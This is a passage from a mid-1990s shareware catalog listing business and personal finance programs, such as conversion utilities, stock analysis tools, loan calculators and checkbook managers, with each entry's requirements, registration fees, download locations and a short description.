+ addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited BBS, CompuServe, newsletter, mail support; + 1-month return policy; bonus utilities; bonus data; all ASP- + wide offers (see page 6); discounts on upgrades. + Look for: EPW15.ZIP on BBSs (call 607-533-7072 to download it at + no charge); EPW16.ZIP on CompuServe in CIS:USEN forum LIBrary + 10 (or contact userID 71333,1577 for assistance). + Download size: 507k (about 38 minutes with a 2400 baud modem) + Description: + US postal rates look-up program. Enter the weight of your + mailing piece and the postage is automatically displayed. All + classes of mail. Comparison feature shows most economical + postage. Country lookup for foreign mailings. Fun facts about + the Postal Service. + + + Product: EXPRESSGRAPH + Pie, line, bar charts for business apps. See full description + on page 570. + + Product: Fixed Asset Pro [***] + Comprehensive fixed asset depreciation system. See full + description on page 315. + + Product: Judy's TenKey + Powerful, flexible Windows calculator. See full description on + page 148. + + Product: METRIC-X + Author: Orion Development Corporation, 703-802-0088 + Version: 2.03 (09-01-93) + Needs: IBM PC, DOS 2.1 or better. 126k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; Dual 720k floppy drives; + Hard disk. + Registration fee: $24.95 (add $2.75 for shipping to U.S. + addresses) (add $2.75 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; 31/2" + master disk(s); 51/4" master disk(s); 12 months of unlimited + tollfree 800# phone, fax, CompuServe, mail support; 1-month + + Chapter 7, "Business" 382 + + + + limited return policy; royalty-free runtime license; LAN + license; site license. 3-month free upgrading allowed. + Look for: MX-203.ZIP on BBSs (call 703-425-2505 to download it at + no charge); MX-203.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 7 (or contact userID 71140,2416 for assistance). + Download size: 137k (about ten minutes with a 2400 baud modem) + Description: + This Metric-English-Metric conversion utility uses drop-down + menus to display/select any of 12 categories and 179 units of + measure. Noted for being very user-friendly and extremely + accurate. This program has been designated as an "accepted + metric conversion tool" by the U.S. Interagency Council on + Metric Policy's Metric Operating Committee (ICMP/ MOC) and is + currently the only conversion utility to carry this + distinction. Based upon ANSI/IEEE Std-268-1992. + + + Product: Personal Time Card + Electronic time card. See full description on page 178. + + Product: q&dBase for Windows + Database creation and maintenance program. See full + description on page 282. + + Product: Simply Labels + Free form label program with many features. See full + description on page 89. + + Product: Vehicle Costs + Reports on costs involved with vehicle use. See full + description on page 340. + + Product: WinUpD8R + Work/home file transfer/update/backup utility. See full + description on page 31. + + 7.16.1 Weights & measurements + + See also: Utilities, Desktop utilities, Calculators; Finances, + Financial calculators. + + Chapter 7, "Business" 383 + + + + Product: Convert It!(tm) SE + Author: SMI Corporation, 918-241-2301 + Version: 3.0 (07-08-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM; Hard + disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of phone, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. + Look for: CV300.ZIP on BBSs (call 918-747-2542 to download it at + no charge); CONVIT.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 10 (or contact userID 72644,2335 for assistance). + Download size: 321k (about 24 minutes with a 2400 baud modem) + Description: + Ultimate unit of measure conversion utility for MS Windows. 15 + groups of conversions with one more for custom conversions. You + can edit the conversion factors, add or delete units. Customize + it for the way YOU work. Turn conversion groups off/on. You + can even turn off/on individual conversion factors! Conversions + include: temperature, velocity, density, money, power, force, + distance, and more. On-line context sensitive help. In use by + many Fortune 500, FedGov, NASA and many others. + + + 7.17 Software tools & add-ins + + 7.17.1 For multiple programs + + Product: QUIK-INSTALL + 7k application install program! Many features. See full + description on page 488. + + 7.17.2 For other + + Product: DAYO INDEX + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.50+ (02-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $40.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + + Chapter 7, "Business" 384 + + + + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYOXE.EXE on BBSs (call 407-292-4921 to download it at + no charge); DAYOXE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Designed to manage the indexing of the DAYO databases. DAYO + applications all have multiple indexes, and because it is + recommended that they be reindexed at least once daily, this + was created to simplify this process. + + + Product: DAYO PASSWORDS + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.50+ (01-01-94) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. DAYO modules. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, fax, BBS, CompuServe, + mail support; LAN license; site license; bonus utilities; bonus + data; discounts on other products; discounts on upgrades. + 1-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: DAYOIDE.EXE on BBSs (call 407-292-4921 to download it + at no charge); DAYIDE.EXE on CompuServe in CIS:ACCOUNTING forum + LIBrary 5 (or contact userID 76367,1401 for assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Provides DAYO Business Application users with a system of + database security through the use of passwords. Its use is + optional, but recommended in areas where more than one person + has access to the data. + + + Product: EXTENDED BATCH LANGUAGE-PLUS! + The real batch language you wish DOS had. See full description + on page 125. + + Chapter 7, "Business" 385 + + + + 7.18 Other + + Product: DAYO SMART REPORTS + Author: TJS LAB, Inc., 407-291-3960 + Version: 4.51+ (12-01-93) + Needs: IBM PC, DOS 3.3 or better. 530k RAM; CGA monitor; Hard + disk; HP LaserJet printer; Epson printer. + Registration fee: $75.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $20.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, BBS, CompuServe, mail support; + LAN license; site license; bonus utilities; bonus data; + discounts on other products; discounts on upgrades. 1-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: DAYORE.EXE on BBSs (multiple files) (call 407-292-4921 + to download it at no charge); DAYORE.EXE on CompuServe in + CIS:ACCOUNTING forum LIBrary 5 (multiple files) (or contact + userID 76367,1401 for assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + Contains many reports/routines that will help you manage your + purchasing, inventory, invoices, backorders, sales, and your + databases. There are many reports, lists and routines included + in smart reports, ie: single warehouse, valuation expanded, + reorder, late PO, margin (history), vendor list, customer list, + inventory item list, expenses list, warehouse adjustments, HP + laser pull sheet, available inventory, GL posting problems, + view reports on screen, and many more! + + Chapter 8, "Finances" 386 + + + + + + Chapter 8 + Finances + + See also: Spreadsheet applications; Mathematics; Business. + + + 8.1 Stock trading & analysis + + Product: Capital Gainz + Investment portfolio manager. See full description on + page 401. + + Product: DDE Requester for Win3.x & NT + DDE history recorder to access1.1 MDB or text. See full + description on page 406. + + Product: THE FEELING'S MUTUAL-DOS + Mutual fund database/investment analysis. See full description + on page 391. + + Product: THE FEELING'S MUTUAL-Macintosh + Mutual fund database/financial planner. See full description + on page 391. + + Product: THE FEELING'S MUTUAL-WINDOWS + Mutual fund database/financial planner. See full description + on page 393. + + Product: PC Chart + Author: Guru Systems Ltd., 604-299-1010 + Version: V1.5 (07-15-93) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives; Hard disk; HP + DeskJet printer; HP LaserJet printer; Hayes-compatible modem. + Registration fee: $99.00 (add $7.00 for shipping to U.S. + addresses) (add $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, CompuServe, + GEnie, newsletter, mail support; all ASP-wide offers (see + page 6). + Look for: availability unknown on BBSs; PCE15.ZIP on CompuServe + in CIS:INVFORUM forum LIBrary 3 (multiple files) (or contact + userID 72717,1651 for assistance); PCC15.ZIP on GEnie in INVEST + forum LIBrary 3 (multiple files) (or contact userID G.QUONG for + assistance). + Download size: 720k (about 54 minutes with a 2400 baud modem) + Description: + An integrated technical analysis program that combines + charting, database and telecommunications capabiltities. + Generates stock charts and standard technical indicators such + as moving averages, RSI and Money Flow. Built-in + telecommunication capabilities can be used to download + + Chapter 8, "Finances" 387 + + + + historical, end-of-day, and intraday prices from CompuServe, + Dial/Data and GEnie. Supports PC Chart, ASCII and CSI data + formats and up to 400 files in one subdirectory. + + + Product: Personal Finances 2 + Full function personal/small business finance. See full + description on page 395. + + Product: Portfolio Manager + Powerful record system for your investments. See full + description on page 402. + + Product: Stock Wiz + Author: Informatik Inc., 610.640.0339 + Version: 2.0 (06-15-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; STCKWZ.ZIP on CompuServe + in CIS:INVFORUM forum LIBrary 1 (or contact userID 76534,1166 + for assistance). + SWREG#: 6323 + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Multi-dimensional stock price analyser. Using earnings, + growth, term and yield target, system calculates fundamental + stock values. "What-if" calculations. Easy to use. Shows + detail of underlying calculation. An essential tool for + validating stock investment and trading decisions. + + + Product: Total Investor for 1-2-3 DOS [***] + Author: Hughes Financial Services, 201-895-5665 + Version: 2.1 (11-12-93) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; CGA monitor. Lotus + 1-2-3 version 2.0 or later; Quattro Pro. + Registration fee: $35.00 + Registration benefits: 51/4" master disk(s); 3 months of phone, + CompuServe support; bonus data. + Look for: TI123.ZIP on BBSs (call 312-280-8565 to download it at + no charge); TI123.ZIP on CompuServe in CIS:LOTUS forum LIBrary + 2 (or contact userID 76057,2400 for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + An integrated portfolio management and technical analysis + template for Lotus 1-2-3 and Quattro Pro. Keeps track of + securities, charts price trends, and makes buy/sell decisions + + Chapter 8, "Finances" 388 + + + + based on technical indicators. These indicators include moving + averages, relative strength, momentum, RSI, and many others. + Total Investor maintains both current and historical quotes. + Can be linked to Compuserve, Prodigy, DJN/R, Genie and Signal. + + + Product: Total Investor for 1-2-3 Window [***] + Portfolio management and charting for 1-2-3. See full + description on page 272. + + Product: Total Investor for Symphony [***] + Author: Hughes Financial Services, 201-895-5665 + Version: 2.1 (09-10-93) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; CGA monitor; Modem. + Lotus Symphony version 1.1 or later. + Strongly recommended: EMS memory. + Registration fee: $50.00 + Registration benefits: 51/4" master disk(s); 3 months of phone, + CompuServe support; bonus data. + Look for: TISYM.ZIP on BBSs (call 312-280-8565 to download it at + no charge); TISYM.ZIP on CompuServe in CIS:LOTUS forum LIBrary + 6 (or contact userID 76057,2400 for assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + An integrated portfolio management and technical analysis + template for Lotus Symphony. Can be used to keep track of + securities, chart stocks, and make buy/sell decisions based on + technical indicators. These indicators include moving averages, + momentum, relative strength, RSI, and many others. Updates both + current quotes for your portfolio and historical quotes for + charting and analysis through Dow Jones News Retrieval. + + + Product: Variable Investment Analyst + Comprehensive investment portfolio management. See full + description on page 404. + + Product: Wall Street Simulator - Windows + Author: Larax Software + Version: 1.00 (06-25-94) + Needs: IBM 80386, Windows 3.0 or better. 640k RAM; EGA monitor; + Dual 720k floppy drives; VBRUN300.DLL. + Strongly recommended: VGA monitor; Hard disk; HP DeskJet + printer; HP LaserJet printer; Postscript printer; Mouse; Epson + printer; EMS memory; XMS memory. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of + unlimited CompuServe, newsletter, mail support; 1-month return + policy; all ASP-wide offers (see page 6); discounts on other + + Chapter 8, "Finances" 389 + + + + products; discounts on upgrades. 1-month free upgrading + allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; WSSW10.ZIP on CompuServe + in CIS:INVFOR forum LIBrary 0 (or contact userID 73577,115 for + assistance). + SWREG#: 2838 + Download size: 130k (about ten minutes with a 2400 baud modem) + Description: + Realistic simulation of a brokerage account. Allows trades to + be made using real market prices. Analyze results and compare + to other registered users. + + + 8.2 Personal finances + + See also: Business, Business finances. + + Product: AstroFormulaCalculator 3 + Spreadsheet calculator science engin finance. See full + description on page 270. + + Product: Chris's Automobile Recorder + Vehicle operation & maint. logger & reminder. See full + description on page 638. + + Product: THE FEELING'S MUTUAL-DOS + Author: Interpretive Software Inc., 804-979-0245 + Version: 3.1.93 (04-01-94) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; CGA monitor; Hard + disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Epson printer. + Registration fee: $60.00 (add $2.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); lifetime unlimited phone, fax, CompuServe, newsletter, + mail support; 1-month limited return policy; bonus data; all + ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; TFM393.ZIP on CompuServe + in CIS:INVESTORS forum LIBrary 5 (or contact userID 70401,2062 + for assistance). + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Provides a straight-forward presentation of mutual fund + investment alternatives. Designed for investors of all levels + of experience. Search for funds which meet given criteria or + your personal profile. Includes risk and load adjusted + analysis. Detailed information on over 150 funds (800 in + expanded version). Comes with on-line help, newsletter, + references, sample projections and fund family information. + + Chapter 8, "Finances" 390 + + + + Product: THE FEELING'S MUTUAL-Macintosh + Author: Interpretive Software Inc., 804-979-0245 + Version: 3.1.93 (04-15-94) + Needs: Macintosh, System 6.0.0 or better. 1000k RAM. Macintosh + Plus or better. + Strongly recommended: Hard disk. + Registration fee: $60.00 (add $2.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); lifetime + unlimited phone, fax, CompuServe, newsletter, mail support; + 1-month limited return policy; bonus data; all ASP-wide offers + (see page 6); discounts on other products; discounts on + upgrades. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs. + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Provides a straight-forward presentation of mutual fund + investment alternatives. Designed for investors of all levels + of experience. Search for funds which meet given criteria or + your personal profile. Includes risk and load adjusted + analysis. Detailed information on over 150 funds (800 in + expanded version). Includes on-line help, newsletter, + references, sample projections and fund family information. + + + Product: THE FEELING'S MUTUAL-WINDOWS + Author: Interpretive Software Inc., 804-979-0245 + Version: 3.1.93 (04-01-94) + Needs: IBM PC, Windows 3.0 or better. 2000k RAM; VGA monitor; + Hard disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Mouse; Epson printer; XMS memory. + Registration fee: $60.00 (add $2.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); lifetime unlimited phone, fax, CompuServe, newsletter, + mail support; 1-month limited return policy; bonus data; all + ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; TFM393.ZIP on CompuServe + in CIS:INVESTORS forum LIBrary 5 (or contact userID 70401,2062 + for assistance). + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Provides a straight-forward presentation of mutual fund + investment alternatives. Designed for investors of all levels + of experience. Search for funds which meet given criteria or + your personal profile. Includes risk and load adjusted + analysis. Detailed information on over 150 funds (800 in + expanded version). Includes on-line help, newsletter, + references, sample projections and fund family information. + + Chapter 8, "Finances" 391 + + + + Product: Financial Analysis For Windows + Author: Gjetaas, Inc., 360-599-2418 + Version: 4.0 (08-01-95) + Needs: IBM 80386, Windows 3.1 or better. 4k RAM. + Strongly recommended: Hard disk; Mouse. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited phone, CompuServe support; 1-month + return policy; discounts on upgrades. + Look for: WINFIN*.ZIP on BBSs; WINFIN.ZIP on CompuServe in + CIS:INVFORUM forum LIBrary 2 (or contact userID 70135,1052 for + assistance). + SWREG#: 1627 + PsL#: 20337 + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + * Mortgage & rule-78 with amortization + * Bonds, bond ladder, T-bills, CDs, BAs + * Black-Scholes options with ability to calc implied + volitility + * Portfolio hedge - buy an index put to protect your stocks + * IRR, MIRR, NPV with 1,900+ cash flows allowed + * Retirement planning: payout increases each year w/ + inflation + * Auto lease- select variable to solve + * Days between dates arithmetic, 50 year calendar + * Random number generator + * Plain vanilla: annuity & compound interest + + + Product: FINANCIAL WIZARD(tm) + Powerful, user friendly financial calculator. See full + description on page 407. + + Chapter 8, "Finances" 392 + + + + Product: Home Refinancing + Author: ProDomus, Inc., 203-233-0705 + Version: 1.2 (03-21-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; CGA monitor; Hard + disk. + Strongly recommended: EGA monitor; Mouse. + Registration fee: $34.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, fax, CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: HOMRF10A.ZIP on BBSs (multiple files) (call + 718-837-3236 to download it at no charge); HOMRF.ZIP on + CompuServe in CIS:IBMAPP forum LIBrary 4 (or contact userID + 74650,3623 for assistance). + SWREG#: 1718 + PsL#: 11237 + Download size: 552k (about 41 minutes with a 2400 baud modem) + Description: + Will refinancing save money? This caculates the acutal and + time value amount of savings or loss. Points may be + capitalized. Bonus calculators show alternative payment options + (any number of periods per year, payments in advance or + arrears) and amortization schedules with amounts for principal + and interest for the life of the loan and each year. Options + may be saved and printed. Mouse support, DOS GUI (graphical) + or text mode. Multiuser. + + + Product: LAPC - Loan Advisor for the PC + Author: J.D. Consulting Associates, 518-482-5789 + Version: 2.3 (04-01-94) + Needs: IBM AT (80286), DOS 3.0 or better. 480k RAM; CGA monitor; + Hard disk; Epson printer. + Strongly recommended: VGA monitor; HP LaserJet printer. + Registration fee: $19.95 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of phone, fax, mail support; 1-month limited + return policy; bonus utilities; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products; + discounts on upgrades. 1-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: availability unknown on BBSs. + Download size: 450k (about 34 minutes with a 2400 baud modem) + Description: + Performs loan calculations for any type of fixed rate loan from + one to 50 yrs. It will calculate remaining principle, payoff + effect of principle prepayments and total interest charges. + LAPC is designed as a tool for loan management and for + + Chapter 8, "Finances" 393 + + + + comparing various loan parameters for choosing the best + alternative. + + + Product: Personal Finances 2 + Author: Spitfire Software, 404-257-0187 + Version: 4.02h (01-12-94) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; Hard disk. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, newsletter, + mail support; all ASP-wide offers (see page 6); discounts on + other products; discounts on upgrades. 3-month free upgrading + allowed. 1 free update disk(s) sent out. + Look for: PF2-*.ZIP on BBSs (multiple files) (call 404-419-0888 + to download it at no charge); PF2.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 4 (or contact userID 73577,442 for + assistance). + Download size: 1000k (about 74 minutes with a 2400 baud modem) + Description: + A full function personal and small business financial system + for DOS. It supports all types of accounts-checking, credit + card, stock margin, etc. It has integrated subsystems for + multi-year budgeting, accounts pay/rcv, fixed assets/home + inventory, and financial investments. PF2 prints checks, works + with CheckFree, interfaces to TurboTax, imports stock quotes + from Prodigy, and imports Quicken .QIF files. Has on-line user + guide and extensive context sensitive help. Fully supported. + + + Product: Total Investor for 1-2-3 DOS [***] + Portfolio manager/technical analysis template. See full + description on page 387. + + Product: Total Investor for Symphony [***] + Portfolio manager/technical analysis template. See full + description on page 388. + + Product: Variable Investment Analyst + Comprehensive investment portfolio management. See full + description on page 404. + + Product: WinCharging + The Windows credit card manager. See full description on + page 310. + + 8.2.1 Finances & budgets + + Product: Amortz - Loan Schedules & More! + Easy loan calculation system. See full description on + page 404. + + Chapter 8, "Finances" 394 + + + + Product: Cash Control + A personal finance and business checkbook. See full + description on page 399. + + Product: Charging + Author: My Little Realm Enterprises, 201-529-8318 + Version: 3.2 (04-12-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $8.50 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support. 3-month + return policy. 6-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: MLRCRG32.ZIP on BBSs; MLRCRG.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 0. + Download size: 270k (about 20 minutes with a 2400 baud modem) + Special instructions: Product distribution restricted to the + United States. + Description: + Lets you easily track your credit card expenditures and + payments. Tallies income tax expenses, home expenses, whatever + you want. Quickeys make data entry fast and easy. + + + Product: Financial Freedom + Author: M & R Technologies, Inc., 407-951-2268 + Version: 2.0 (02-01-94) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk. + Registration fee: $15.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; bonus + utilities; all ASP-wide offers (see page 6); discounts on other + products. + Look for: FFREED.ZIP on BBSs; FFREED.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 11 (or contact userID 72103,505 for + assistance). + Download size: 644k (about 48 minutes with a 2400 baud modem) + Description: + Features include management of checking and savings, budget + control, loan analysis and amortization, check printing, + automated account reconciliations and strong reporting options. + Very easy to use and is designed for individuals who are new to + Windows or finance management. + + Chapter 8, "Finances" 395 + + + + Product: Financial Freedom GOLD + Author: M & R Technologies, Inc., 407-951-2268 + Version: 1.0 (03-30-94) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk. + Registration fee: $24.95 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6); discounts on other products. + Look for: FFGOLD.ZIP on BBSs; FFGOLD.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 11 (or contact userID 72103,505 for + assistance). + Download size: 649k (about 48 minutes with a 2400 baud modem) + Description: + Features include unlimited bank accounts (checking, savings, + credit cards, etc.), automated account reconciliations, + budgeting, check printing, strong reporting options, bill- + reminder utility, password protection, loan analysis and + amortization, online help and much more! + + + Product: FPLAN-KWIK Financial&Retire Pln + Author: First Financial Software, 800-736-4920 + Version: 1.0 (06-14-94) + Needs: IBM PC, DOS 2.1 or better. Hard disk. + Strongly recommended: CGA monitor; HP LaserJet printer; Mouse. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited tollfree 800# phone, mail support; all ASP- + wide offers (see page 6); discounts on other products; + discounts on upgrades. 3-month free upgrading allowed. + Look for: availability unknown on BBSs; KFPLAN.ZIP on CompuServe + in CIS:INVFORUM forum LIBrary 7 (or contact userID 70272,3655 + for assistance). + Download size: 625k (about 47 minutes with a 2400 baud modem) + Description: + Gives a quick analysis of any or all included financial + planning subjects: retirement, education funding, life + insurance, disability, estate preservation, etc. Has option for + US or international subjects/terms. Automatic install program. + Automatic save feature. Tutorial w/printable check-list. + Subject data guides for all items. Financial planning check-up + for suggestions & tips. Automatic insert of other subjects + relevant data in current input module. Quick & easy know & plan + your situation. + + Chapter 8, "Finances" 396 + + + + Product: Money Organizer + Author: Redei Enterprises, 310-832-6984 + Version: 2.0 (04-11-95) + Needs: IBM 80386, Windows 3.1 or better. SVGA monitor; Hard + disk; Mouse; VBRUN300.DLL. + Strongly recommended: Modem; XMS memory; math coprocessor. + Registration fee: $25.00 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs. + Download size: 1800k (about 134 minutes with a 2400 baud modem) + Description: + Handles unlimited number of checking, savings, credit card, + loan, and personal accounts. Allows complete transactions + between accounts. Provides budgeting and maintains all + transactions by budget categories. Creates reports, compares + the actual transactions with your budgets and graphs the + results. Prints reports in any language including those + writing right-to-left like Hebrew. Stores personal data, phone + numbers, dials or pages. Tells you when something is due to + pay. + + + Product: PC-GL + General ledger. See full description on page 317. + + Product: PCLoan5 + Professional loan amortization system. See full description on + page 309. + + Product: QuickTax (tm) Planner/Estimator + Author: Bates Engineering/Software, 916-622-1886 + Version: 1.04 (10-27-93) + Needs: IBM PC, DOS 3.3 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Hercules monitor; Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer. + Registration fee: $19.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, mail support; royalty-free + runtime license; + Look for: QTAX04.ZIP on BBSs. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + A super tax planner and estimator. Ideal for client + interviewing by tax professionals. All 1993 tax data. Get the + most from deductions, credits, IRA, savings plan, pension, + social security, capital gains, dividends, and interest. Get + filing status, dependencies, withholding allowances and + + Chapter 8, "Finances" 397 + + + + estimated payments right. Avoid overpayment, underpayment and + penalties. No confusing tax forms to wade through or + understand. Easy entry. Automatic prompts guide you through all + necessary entries. + + + 8.2.2 Checkbook managers + + Product: Cash Control + Author: Pipedream Software, 701-746-0163 + Version: 1.0 (04-01-93) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; CGA monitor; Dual + 720k floppy drives. + Strongly recommended: EGA monitor; Hard disk. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, newsletter, mail support; all ASP- + wide offers (see page 6). + Look for: CASHC.ZIP on BBSs (call 801-963-8721 to download it at + no charge). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + For people who don't want the complexity of a major accounting + program. Designed with simplicity in mind, the check register + displays the contents like a ordinary hand written register. + While it is simple it also has powerful features. Supports one + or two printers. It has budget help. It installs for personal + or small business. Balance the account, make backups, split + accounts, tax reports and more. + + + Product: Checkbook Management Program + Author: M. P. Data, 615-349-7744 + Version: 5.11 (07-01-93) + Needs: IBM PC, DOS 2.1 or better. 320k RAM. + Strongly recommended: CGA monitor; Hard disk. + Registration fee: $35.00 (add $10.00 for shipping to Canadian + addresses) (add $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support; + lifetime return policy; all ASP-wide offers (see page 6). + 3-month free upgrading allowed. + Look for: MPCH51.ZIP on BBSs. + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + A full-featured checkbook manager. Enter, edit, or delete + transactions. Reconcile bank statement. Print checks (any + format). Numerous reports including expense and income + summaries. No graphics characters - good for screen readers. + + Chapter 8, "Finances" 398 + + + + Product: Checking + Author: My Little Realm Enterprises, 201-529-8318 + Version: 3.2 (04-12-95) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one 